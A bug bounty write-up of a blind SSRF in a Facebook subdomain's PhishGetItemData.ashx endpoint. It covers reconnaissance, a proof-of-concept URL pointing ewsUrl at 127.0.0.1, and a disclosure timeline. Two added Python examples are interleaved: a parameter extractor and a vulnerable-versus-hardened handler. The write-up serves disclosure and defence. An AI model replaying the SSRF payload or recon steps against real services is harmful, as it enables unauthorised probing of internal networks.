Uncovering a blind SSRF Vulnerability in Facebook’s Infrastructure ($10000 — Bug Bounty)
Subdomain enumeration + File bruteforcing + JS analysis = $10K Blind SSRF
This is a write-up about a blind SSRF vulnerability I found and reported to Facebook.
The vulnerability could have allowed a malicious actor to make a Facebook server issue requests into the Facebook corporate network.
1) Subdomain Enumeration
By doing some subdomain enumeration, I discovered the following active subdomain: phishme.thefacebook.com
If you have read my previous article, “Story of a weird vulnerability I found on Facebook”, you are aware of my interest in ‘403 Forbidden’ errors.
2) Javascript File Bruteforcing
By employing a custom wordlist and conducting a file brute force on the path:
https://phishme.thefacebook.com/**.js
I identified a hidden Javascript file named “Home.js” located at:
https://phishme.thefacebook.com/Home.js
3) Code Review of Home.js
By analyzing the code of the Home.js file, I identified an interesting function, sendPhishRequest, that used XMLHttpRequest to send requests to specific server-side endpoints.
A deeper analysis revealed its usage as follows:
Util.sendPhishRequest('PhishGetItemData.ashx', { itemId: itemId, ewsUrl: ewsUrl, token: token });
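The JavaScript analysis of steps 2 and 3, as an added example that is not code from the write-up: a small extractor that pulls every sendPhishRequest call, its endpoint and its parameter names out of a JavaScript file, then flags the parameters whose names suggest the server will fetch them (the next thing to test). SAMPLE_JS is constructed; only the PhishGetItemData.ashx call comes from the write-up, and the second endpoint in it is made up for illustration.

```python
"""Added example (not code from the write-up): extract the endpoints and
parameter names behind every Util.sendPhishRequest call in a JavaScript file
and flag parameters the server is likely to fetch. SAMPLE_JS is constructed;
only the PhishGetItemData.ashx call is from the write-up, the second call is
made up for illustration."""
import re

SAMPLE_JS = r"""
var Util = {};
Util.sendPhishRequest = function (url, params, cb) {
  var xhr = new XMLHttpRequest();
  xhr.open('POST', url, true);
  xhr.onload = function () { cb(JSON.parse(xhr.responseText)); };
  xhr.send(JSON.stringify(params));
};
function loadItem(itemId, ewsUrl, token) {
  Util.sendPhishRequest('PhishGetItemData.ashx', { itemId: itemId, ewsUrl: ewsUrl, token: token }, render);
}
function reportItem(itemId) {  // constructed second call, not from Home.js
  Util.sendPhishRequest("PhishReportItem.ashx", {itemId: itemId}, noop);
}
"""

# A sendPhishRequest call: a quoted endpoint, then an object literal of params.
CALL_RE = re.compile(
    r"""sendPhishRequest\(\s*['"]([^'"]+)['"]\s*,\s*\{([^}]*)\}""", re.DOTALL)
# Keys of the object literal (identifier followed by a colon).
KEY_RE = re.compile(r"\b([A-Za-z_$][\w$]*)\s*:")
# Parameter names that usually mean "the server will make a request to this".
FETCHY_RE = re.compile(r"url|uri|host|endpoint|callback|redirect|feed", re.I)


def extract_endpoints(js_source):
    """Map each endpoint to the ordered list of parameter names sent to it."""
    endpoints = {}
    for endpoint, body in CALL_RE.findall(js_source):
        names = endpoints.setdefault(endpoint, [])
        for key in KEY_RE.findall(body):
            if key not in names:
                names.append(key)
    return endpoints


def ssrf_candidates(endpoints):
    """(endpoint, parameter) pairs worth testing with an attacker-controlled URL."""
    return sorted((ep, p) for ep, names in endpoints.items()
                  for p in names if FETCHY_RE.search(p))


if __name__ == "__main__":
    found = extract_endpoints(SAMPLE_JS)
    for ep, names in found.items():
        print(ep, "<-", ", ".join(names))
    print("test for SSRF:", ssrf_candidates(found))
```

Run it against a real Home.js by reading the file into js_source instead of SAMPLE_JS; on the constructed sample it reports PhishGetItemData.ashx with itemId, ewsUrl and token, and singles out ewsUrl as the SSRF candidate.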
Exploitation:
After conducting a series of experiments and testing various token formats, I was finally able to exploit the function Util.sendPhishRequest to make the server send internal requests.
Params:
itemId: 123
ewsUrl: http://127.0.0.1:PORT
token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg
POC:
https://phishme.thefacebook.com/PhishGetItemData.ashx?itemId=123&ewsUrl=http://127.0.0.1:PORT/&token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7Hg
The endpoint answered with stack-trace errors. These not only gave a deeper understanding of how the internal request was handled but also provided concrete evidence that the blind SSRF vulnerability existed.
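What the vulnerable endpoint most likely does, and what a fix looks like, as an added example that is not the page's or Facebook's code: a handler that passes the client's ewsUrl straight to an HTTP client, beside a hardened version. The handler shape, the allowlisted host ews.corp.example and the injected fetch and resolver functions are assumptions; the real PhishGetItemData.ashx is not shown on the page, and PORT is kept symbolic as in the write-up.

```python
"""Added example (not from the write-up): the unsafe ewsUrl handling pattern
beside a hardened version. Handler shape, allowlist, fetch and resolver are
assumptions for illustration."""
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumed: the only Exchange Web Services host this endpoint should ever call.
ALLOWED_EWS_HOSTS = {"ews.corp.example"}


class SsrfRejected(ValueError):
    """Raised when a client-supplied ewsUrl fails validation."""


def vulnerable_handler(params, fetch):
    """Unsafe pattern: the client's ewsUrl goes straight to the HTTP client,
    so ewsUrl=http://127.0.0.1:PORT/ makes the server probe its own ports."""
    return fetch(params["ewsUrl"])


def validate_ews_url(ews_url, resolver=socket.gethostbyname):
    """Return (host, pinned_ip, port, path) or raise SsrfRejected."""
    parts = urlsplit(ews_url)
    if parts.scheme != "https":
        raise SsrfRejected("only https is allowed")
    # urlsplit drops userinfo, so https://ews.corp.example@127.0.0.1/ yields 127.0.0.1.
    host = (parts.hostname or "").lower()
    if host not in ALLOWED_EWS_HOSTS:
        raise SsrfRejected("host not on allowlist: %r" % host)
    try:
        port = parts.port or 443
    except ValueError:
        raise SsrfRejected("unparseable port") from None
    if port != 443:
        raise SsrfRejected("unexpected port %d" % port)
    # Resolve once and pin the result. The allowlist is the control; this check
    # is defence in depth against an allowlisted name being rebound to a
    # loopback or link-local (e.g. metadata service) address. Private ranges
    # are permitted because an internal EWS host legitimately lives there.
    ip = resolver(host)
    addr = ipaddress.ip_address(ip)
    if addr.is_loopback or addr.is_link_local or addr.is_unspecified:
        raise SsrfRejected("%s resolves to %s" % (host, ip))
    return host, ip, port, parts.path or "/"


def safe_handler(params, fetch, resolver=socket.gethostbyname):
    """Hardened pattern: validate, then connect to the pinned IP with the
    allowlisted name carried in the Host header / SNI."""
    host, ip, port, path = validate_ews_url(params["ewsUrl"], resolver)
    return fetch("https://%s:%d%s" % (ip, port, path), host_header=host)


if __name__ == "__main__":
    def fake_fetch(url, host_header=None):
        return "would fetch %s (Host: %s)" % (url, host_header)

    poc = {"itemId": "123", "ewsUrl": "http://127.0.0.1:PORT/", "token": "..."}
    print(vulnerable_handler(poc, fake_fetch))
    try:
        safe_handler(poc, fake_fetch, resolver=lambda h: "10.20.30.40")
    except SsrfRejected as e:
        print("rejected:", e)
```

The allowlist carries the actual control; the address check only guards against an allowlisted name being rebound to a loopback or link-local address, and pinning the resolved IP ensures the check and the connection use the same address rather than resolving twice.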
Timeline:
August 7, 2020: Reported
August 11, 2020: Triaged
August 11, 2020: Patched
December 3, 2020: Resolved
December 3, 2020: $10000 Bounty awarded
Amine Aboud
Twitter: https://twitter.com/amineaboud